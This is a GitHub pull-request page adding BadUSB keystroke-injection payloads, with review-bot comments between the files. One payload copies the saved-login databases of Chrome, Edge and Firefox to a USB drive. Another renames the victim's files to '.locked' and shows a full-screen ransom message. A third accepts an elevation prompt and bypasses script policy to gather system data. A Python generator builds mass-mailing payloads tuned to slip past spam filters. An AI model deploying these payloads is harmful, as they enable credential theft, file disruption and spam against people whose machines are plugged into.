Merge pull request #591 from MarkCyber/main

More BadUSB Scripts
UberGuidoZ 2024-05-29 14:21:25 -07:00 committed by GitHub
commit 86de7d9a9b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
6 changed files with 980 additions and 0 deletions


@ -0,0 +1,42 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%
REM %%%%%%%%%%%% This script is intended to send an email via badUSB (into your logged in gmail on chrome) %%%%%%%%%%%%
REM %%%%%%%%%%%% This script will open chrome, send an email, and then close chrome. Must be logged in to email %%%%%%%%%%%%
REM %%%%%%%%%%%% You can use python to replicate this script by changing email addresses & name every time %%%%%%%%%%%%
REM %%%%%%%%%%%% The python script in section 2.1 generates badusb scripts for multiple emails if need be %%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
GUI r
DELAY 500
STRING chrome
ENTER
DELAY 1000
STRING https://mail.google.com/mail/u/0/#inbox?compose=new
ENTER
DELAY 5000
DELAY 1000
STRING {EMAIL ADDRESS YOU WANT TO SEND EMAIL TO}
DELAY 500
TAB
TAB
STRING {YOUR SUBJECT NAME}
TAB
STRING Hi {THEIR NAME}
ENTER
ENTER
STRING {CONTENTS OF THE EMAIL}
ENTER
ENTER
STRING {IF YOU WANT A SECOND PARAGRAPH, THIS IS WHAT DOUBLE-ENTER ABOVE DOES}
ENTER
ENTER
STRING Respectfully,
ENTER
ENTER
STRING {YOUR NAME}
ENTER
CTRL ENTER
DELAY 5000
DELAY 1000
ALT F4
REM check out github.com/markcyber for more scripts


@ -0,0 +1,101 @@
#######################################################################################################################################
#######################################################################################################################################
################# This script was created by github.com/MarkCyber (w/ assistance of ai) ####################
################# This is a python script to automatically create BadUSB scripts to auto send emails ####################
################# This takes a excel sheet with the columns named "Names" and "Emails" ####################
################# This script will then make a badusb script using the name + email of each person ####################
################# There are various subject options that will be chosen from, to minimize "spam" ####################
################# Change the signature to your name, and put subject options that fit your email ####################
################# Lastly, of course make sure to change the contents of the email to what you want ####################
#######################################################################################################################################
#######################################################################################################################################
import pandas as pd
import random
# Load the Excel file, make sure it has the same name (or change the name in this script)
file_path = 'NameAndEmails.xlsx'
data_df = pd.read_excel(file_path)
# Your excel should have 2 columns. Names, and Emails.
data_cleaned_df = data_df[['Names', 'Emails']].dropna().reset_index(drop=True)
data_cleaned_df.columns = ['Name', 'Email']
# List of placeholder subject options. Change these to 7 similar subjects that match your email (if you are sending many. You can use the same if not)
subject_options = [
"Placeholder for subject option 1",
"Placeholder for subject option 2",
"Placeholder for subject option 3",
"Placeholder for subject option 4",
"Placeholder for subject option 5",
"Placeholder for subject option 6",
"Placeholder for subject option 7"
]
# Placeholder for email body template. The name field will be filled from the "names" section in the excel sheet you provided.
# Just modify the actual email body and sender name to fit your needs
email_body_template = """
Hi {name},
Placeholder for email body.
Warm Regards,
Sender Name
"""
# Function to generate BadUSB script
def generate_badusb_script_with_placeholders_single_file(data_df):
script_template = [
"DELAY 1000",
"GUI r",
"DELAY 500",
"STRING chrome",
"ENTER",
"DELAY 1000",
"STRING https://mail.google.com/mail/u/0/#inbox?compose=new", # In chrome it opens gmail to compose an email. This is why you must be logged in.
"ENTER",
"DELAY 5000"
]
scripts = script_template
for index, row in data_df.iterrows():
name = row['Name']
email = row['Email']
subject = random.choice(subject_options)
random_delay = random.randint(10000, 25000)
email_body_lines = email_body_template.format(name=name).strip().split('\n')
email_body_lines = [f"STRING {line.strip()}" for line in email_body_lines if line.strip()]
email_script = [
"DELAY 1000",
f"STRING {email}",
"DELAY 500",
"TAB",
"TAB",
f"STRING {subject}",
"TAB"
] + email_body_lines + [
"ENTER",
"CONTROL ENTER",
"DELAY 5000",
f"DELAY {random_delay}", #random delay so emails are not sent at the sames, ideally minimizing the potential to be marked as spam
"ALT F4"
]
scripts += email_script
return "\n".join(scripts)
# Generate the BadUSB script with placeholders and proper send command in a single file
final_script_with_placeholders = generate_badusb_script_with_placeholders_single_file(data_cleaned_df)
# Save the script to a file
final_script_file_path = 'final_script_with_placeholders.txt' #This would be your badusb script
with open(final_script_file_path, 'w') as file:
file.write(final_script_with_placeholders)
print(f"Script saved to {final_script_file_path}")
#check out github.com/markcyber for more badusb / pen testing / automation tools and scripts
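Review bot: The `Email` cell is written into the generated payload verbatim at `f"STRING {email}"`, so a spreadsheet cell that contains a line break yields an extra output line with no `STRING` prefix, which the device's interpreter will read as a command instead of typed text. The name field appears to avoid this only because the formatted body is split on newlines and every piece is re-prefixed. I would validate the cell before emitting anything for that row, e.g. `email = str(row['Email']).strip()` followed by `if not email or any(c.isspace() for c in email): continue`. Separately, `scripts = script_template` aliases the list instead of copying it; `scripts = list(script_template)` states the intent and keeps a second call from appending to the first call's output. The function's indentation is not recoverable from this page, so the placement of `return` relative to the loop could not be checked.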


@ -0,0 +1,54 @@
REM ##################################################################################################################
REM ############## This script was created by github.com/markcyber ##############
REM ############## This script requires a secondary USB named "MYUSB" to save credentials to ##############
REM ############## The extracted data will require decryption ##############
REM ##################################################################################################################
REM Open PowerShell
DELAY 1000
GUI r
DELAY 500
STRING powershell
DELAY 500
ENTER
DELAY 1000
REM Check if the USB drive exists
STRING $usbDrive = Get-WmiObject Win32_Volume | ? { $_.Label -eq 'MYUSB' } | Select -ExpandProperty DriveLetter;
STRING if ($usbDrive -ne $null) {
ENTER
DELAY 500
STRING cd $usbDrive;
ENTER
DELAY 500
STRING mkdir BrowserData;
ENTER
DELAY 500
STRING cd BrowserData;
ENTER
DELAY 500
REM Copy Chrome Login Data to USB
STRING $chromePath = "$env:LOCALAPPDATA\Google\Chrome\User Data\Default\Login Data";
STRING if (Test-Path $chromePath) { Copy-Item $chromePath "$usbDrive\BrowserData\ChromeLoginData"; }
ENTER
DELAY 500
REM Copy Firefox Login Data to USB
STRING $firefoxPath = "$env:APPDATA\Mozilla\Firefox\Profiles\";
STRING if (Test-Path $firefoxPath) { Copy-Item $firefoxPath -Recurse "$usbDrive\BrowserData\FirefoxData"; }
ENTER
DELAY 500
REM Copy Edge Login Data to USB
STRING $edgePath = "$env:LOCALAPPDATA\Microsoft\Edge\User Data\Default\Login Data";
STRING if (Test-Path $edgePath) { Copy-Item $edgePath "$usbDrive\BrowserData\EdgeLoginData"; }
ENTER
DELAY 500
STRING }
ENTER
DELAY 500
REM Clear the clipboard to remove any sensitive data (This is not necessary, unless you did something on target PC)
STRING echo off | clip
ENTER
DELAY 500
REM Close PowerShell
STRING exit
ENTER
DELAY 500
REM Check out Github.com/MarkCyber for more badusb scripts and other hacky stuff


@ -0,0 +1,630 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script acts as a plug-in vulnerability scanner. Only use with permission %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This will require a secondary USB named as "MYUSB" to save all information onto %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This will find information on the following and save results in a results.txt file %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Info on: password policy, audit services, network settings, softwares and versions, CVEs %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Info on: open ports, firewall status, antivirus status, smbv1 status, missing updates & more %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
REM Open Start Menu
CONTROL ESCAPE
DELAY 2000
STRING powershell
REM Navigate to the context menu to run PowerShell as an administrator
DELAY 500
RIGHTARROW
DELAY 100
DOWNARROW
DELAY 100
ENTER
DELAY 3000
ALT Y
DELAY 5000
REM Set PowerShell Execution Policy to Bypass
DELAY 1000
STRING set-executionpolicy bypass -scope process -force
DELAY 200
ENTER
DELAY 200
REM Create the PowerShell script in memory and execute it
DELAY 200
STRING $usbName = "MYUSB"
DELAY 200
ENTER
DELAY 200
STRING $usbDrive = Get-WmiObject Win32_Volume | Where-Object { $_.Label -eq $usbName } | Select-Object -ExpandProperty DriveLetter
DELAY 200
ENTER
DELAY 200
STRING if ($usbDrive) {
DELAY 200
ENTER
DELAY 200
STRING $owner = (Get-WmiObject Win32_ComputerSystem).UserName
DELAY 200
ENTER
DELAY 200
STRING $directoryPath = Join-Path -Path $usbDrive -ChildPath $owner
DELAY 200
ENTER
DELAY 200
STRING New-Item -ItemType Directory -Path $directoryPath
DELAY 200
ENTER
DELAY 200
STRING $resultsFilePath = Join-Path -Path $directoryPath -ChildPath "results.txt"
DELAY 200
ENTER
DELAY 200
STRING "" > $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING function check-passwordpolicy {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING net accounts
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking password policy: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function audit-services {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-service | select-object name, displayname, status, starttype
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error auditing services: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-networksettings {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-netipconfiguration
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking network settings: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-softwarevulnerabilities {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-itemproperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | select-object displayname, displayversion, publisher
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking software vulnerabilities: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-cve {
DELAY 200
ENTER
DELAY 200
STRING param (
DELAY 200
ENTER
DELAY 200
STRING [string]$productname,
DELAY 200
ENTER
DELAY 200
STRING [string]$version
DELAY 200
ENTER
DELAY 200
STRING )
DELAY 200
ENTER
DELAY 200
STRING $initialDelay = 2
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING $uri = "https://services.nvd.nist.gov/rest/json/cves/1.0?keyword=$productname+$version"
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING $response = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($response.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $response.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking CVEs: $_"
DELAY 200
ENTER
DELAY 200
STRING if ($_.Exception -match '403') {
DELAY 200
ENTER
DELAY 200
STRING write-output "403 Forbidden error encountered. Retrying in 60 seconds..."
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds 60
DELAY 200
ENTER
DELAY 200
STRING $retryResponse = invoke-restmethod -uri $uri -method get
DELAY 200
ENTER
DELAY 200
STRING if ($retryResponse.totalresults -gt 0) {
DELAY 200
ENTER
DELAY 200
STRING foreach ($cve in $retryResponse.result.cve_items) {
DELAY 200
ENTER
DELAY 200
STRING "$($cve.cve.cve_data_meta.id) - $($cve.cve.description.description_data[0].value)"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING "no cves found for $productname $version"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function analyze-logs {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-eventlog -logname system -newest 100
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error analyzing logs: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-openports {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netstat -an
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking open ports: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-missingupdates {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING write-output "Checking Windows Update logs..."
DELAY 200
ENTER
DELAY 200
STRING $updateLogPath = Join-Path -Path $directoryPath -ChildPath "WindowsUpdate.log"
DELAY 200
ENTER
DELAY 200
STRING Get-WindowsUpdateLog -LogPath $updateLogPath
DELAY 200
ENTER
DELAY 200
STRING write-output "WindowsUpdate.log written to $updateLogPath"
DELAY 200
ENTER
DELAY 200
STRING Remove-Item -Path "C:\Users\$env:USERNAME\AppData\Local\Temp\WindowsUpdateLog\*" -Recurse -Force
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error getting Windows Update log: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-firewallstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING netsh advfirewall show allprofiles
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking firewall status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-smbv1status {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-windowsoptionalfeature -online -featurename smb1protocol
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking SMBv1 status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING function check-antivirusstatus {
DELAY 200
ENTER
DELAY 200
STRING try {
DELAY 200
ENTER
DELAY 200
STRING get-mpcomputerstatus
DELAY 200
ENTER
DELAY 200
STRING } catch {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error checking antivirus status: $_"
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING check-passwordpolicy >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING audit-services >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-networksettings >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-softwarevulnerabilities >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING analyze-logs >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-openports >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-missingupdates >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-firewallstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-smbv1status >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING check-antivirusstatus >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
REM Dynamically identify critical software from running processes and scheduled tasks
STRING $runningSoftware = Get-Process | Select-Object Name | Sort-Object Name -Unique
DELAY 200
ENTER
DELAY 200
STRING $scheduledTasks = schtasks /query /fo CSV | ConvertFrom-Csv | Select-Object TaskName, TaskToRun | Sort-Object TaskToRun -Unique
DELAY 200
ENTER
DELAY 200
REM Combine running software and scheduled tasks
STRING $softwareList = @()
DELAY 200
ENTER
DELAY 200
STRING foreach ($process in $runningSoftware) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += $process.Name
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING foreach ($task in $scheduledTasks) {
DELAY 200
ENTER
DELAY 200
STRING $softwareList += [System.IO.Path]::GetFileNameWithoutExtension($task.TaskToRun)
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
REM Remove duplicates and empty entries
STRING $softwareList = $softwareList | Sort-Object -Unique | Where-Object { $_ -ne "" }
DELAY 200
ENTER
DELAY 200
REM Check CVEs for identified software
STRING foreach ($software in $softwareList) {
DELAY 200
ENTER
DELAY 200
STRING $version = (Get-ItemProperty hklm:\software\wow6432node\microsoft\windows\currentversion\uninstall\* | Where-Object { $_.DisplayName -eq $software }).DisplayVersion
DELAY 200
ENTER
DELAY 200
STRING if ($version) {
DELAY 200
ENTER
DELAY 200
STRING check-cve -productname $software -version $version >> $resultsFilePath
DELAY 200
ENTER
DELAY 200
STRING $initialDelay += (Get-Random -Minimum 5 -Maximum 10)
DELAY 200
ENTER
DELAY 200
STRING start-sleep -seconds $initialDelay
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING write-output "Results saved to USB drive."
DELAY 200
ENTER
DELAY 200
STRING } else {
DELAY 200
ENTER
DELAY 200
STRING write-output "Error: USB drive MYUSB not found."
DELAY 200
ENTER
DELAY 200
STRING }
DELAY 200
ENTER
DELAY 200
STRING invoke-command -scriptblock $script
DELAY 200
ENTER
DELAY 20000
REM check out github.com/markcyber for more badusb/pen testing scripts and tools
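Review bot: The last typed command, `invoke-command -scriptblock $script`, references `$script`, which is never assigned anywhere in this payload, so it can only fail. Every check has already run inline by then, and the REM `Create the PowerShell script in memory and execute it` describes a structure the payload does not have; I would drop the line and reword the REM. The header should also state two data-handling facts that the operator and the system owner need. First, `check-cve` places each product name and version in the query string of a request to services.nvd.nist.gov, so software inventory leaves the assessed host. Second, `results.txt` and the Windows Update log are written unencrypted to the removable drive from an elevated session. The `cves/1.0` path may no longer be served by NVD, so confirm it before trusting a `no cves found` line; a failed lookup appears only as text inside the results file.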


@ -0,0 +1,91 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script simulates a ransomware attack by changing file extensions and displays a message %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Renaming file extensions renders each file unusable until the proper extension is added %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Run (1.1)RansomwareSimulationCleanup to revert the changes and renaming of extensions %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
GUI r
DELAY 1000
REM opens powershell (this is for windows machines)
STRING powershell
ENTER
DELAY 3000
REM Define the locations using correct SpecialFolder enumerations
STRING $folders = @(
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::Desktop,
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::MyPictures,
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::MyMusic,
DELAY 500
ENTER
DELAY 500
STRING [System.Environment+SpecialFolder]::Downloads
DELAY 500
ENTER
DELAY 500
STRING )
DELAY 500
ENTER
DELAY 500
REM Iterate over each location
STRING foreach ($folder in $folders) {
DELAY 500
ENTER
DELAY 500
STRING $path = [Environment]::GetFolderPath($folder)
DELAY 500
ENTER
DELAY 500
REM Get all files in the path and rename them
STRING Get-ChildItem -Path $path -File | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name + '.locked') }
DELAY 500
ENTER
DELAY 500
STRING }
DELAY 500
ENTER
DELAY 2000
REM Display ransomware message
STRING Add-Type -AssemblyName PresentationFramework
DELAY 500
ENTER
DELAY 500
STRING $Window = New-Object System.Windows.Window
DELAY 500
ENTER
DELAY 500
STRING $Window.WindowStartupLocation = 'CenterScreen'
DELAY 500
ENTER
DELAY 500
STRING $Window.WindowState = 'Maximized'
DELAY 500
ENTER
DELAY 500
STRING $Window.Topmost = $true
DELAY 500
ENTER
DELAY 500
STRING $Window.Content = 'Your files have been encrypted. This is a simulation. Please contact your IT support team.'
DELAY 500
ENTER
DELAY 500
STRING $Window.ShowDialog()
DELAY 500
ENTER
DELAY 2000
STRING exit
DELAY 500
ENTER
REM check out my github at github.com/markcyber for more badusb & hacking type tools
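Review bot: Nothing records which files the `Rename-Item` line actually renamed, so recovery depends entirely on the suffix match in the cleanup payload. That match (`Where-Object { $_.Name.EndsWith('.locked') }` in the cleanup file) also strips `.locked` from any file in those folders that carried the suffix before the exercise. `Rename-Item` also errors on a file whose `name.locked` already exists, which can leave a folder partly renamed with no summary of what was skipped. I would have the loop append each original full path to a manifest file before renaming and have the cleanup payload restore only the paths listed there, reporting any it could not restore. The window text says the files 'have been encrypted' although the payload only renames them; wording that says the files were renamed keeps the exercise write-up and any help-desk ticket accurate.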


@ -0,0 +1,62 @@
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This script was created by github.com/MarkCyber %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This is a follow-up script to the RansomwareSimulation %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% Running this renames all extensions back to their original, full path- making them usable %%%%%%%%%%%%%%
REM %%%%%%%%%%%%% This can be ran multiple times if necessary %%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
REM %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
DELAY 1000
GUI r
DELAY 2000
STRING powershell
ENTER
REM increased delays to make sure each command can go through even on slower computers
DELAY 6000
REM Define the locations using correct SpecialFolder enumerations
STRING $folders = @(
DELAY 1000
ENTER
DELAY 1000
STRING [System.Environment+SpecialFolder]::Desktop,
DELAY 1000
ENTER
DELAY 2000
STRING [System.Environment+SpecialFolder]::MyPictures,
DELAY 1000
ENTER
DELAY 2000
STRING [System.Environment+SpecialFolder]::MyMusic,
DELAY 1000
ENTER
DELAY 2000
STRING [System.Environment+SpecialFolder]::Downloads
DELAY 1000
ENTER
DELAY 2000
STRING )
DELAY 1000
ENTER
DELAY 3000
REM Iterate over each location
STRING foreach ($folder in $folders) {
DELAY 1000
ENTER
DELAY 1000
STRING $path = [Environment]::GetFolderPath($folder)
DELAY 1000
ENTER
DELAY 4000
REM Get all .locked files in the path and rename them back
STRING Get-ChildItem -Path $path -File | Where-Object { $_.Name.EndsWith('.locked') } | ForEach-Object { Rename-Item -Path $_.FullName -NewName ($_.Name -replace '\.locked$', '') }
DELAY 2000
ENTER
DELAY 5000
STRING }
DELAY 1000
ENTER
DELAY 4000
STRING exit
DELAY 1000
ENTER
REM Check out github.com/MarkCyber for more badusb scripts, malware and pen testing stuff